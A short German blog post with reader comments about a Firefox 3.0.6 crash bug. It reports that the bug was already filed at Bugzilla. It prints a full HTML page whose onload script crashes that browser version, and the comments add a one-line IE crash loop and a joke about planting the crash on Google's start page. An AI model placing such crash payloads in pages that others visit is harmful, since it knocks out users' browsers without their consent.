Firefox Crash
Durch Zufall bin ich auf einem mehr oder weniger kleinen Firefox 3 Exploit gestoßen. Dieser Code lässt den Firefox 3 komplett crashen. Der Firefox 2 hingegen “überlebt” diese Seite ohne weiteres. Das ganze ist mehr oder weniger simpler JS OnLoad Code, der dazu führt das sich die Seite selbst löscht (oder es zumindest versucht).
<html>
<head>
<title></title>
</head>
<body onload="
document.designMode='on';//string
document.removeChild(document.firstChild);//object
document.queryCommandState('BackColor');
">
</body>
</html>
Getestet wurde das ganze nun schon mit 6 Leuten, entweder mit Linux/Ubuntu oder Windows, jeweils mit der aktuellsten Firefox Version 3.0.6. Immer mit dem gleichen Resultat. Wer sich davon nochmal überzeugen möchte, kann hier davon überzeugen (Achtung, Firefox 3.0.6 wird definitiv abstürzen!).
Ein Report bei Bugzilla zu diesem Stückchen Code existiert bereits.
206-092-388
Simon @ irc.euirc.net
ich hätte echt nicht erwartet, dass es so etwas für den Firefox geben wird…
http://www.crashie.com/ ist ja nur ein beispiel für die selbe funktionalität für den internet explorer.
for(x in document.write){document.write(x);}
Wow, meinen hat’s auch weggehauen. Sowas würd’ ich gern mal auf der Google Startseite einbauen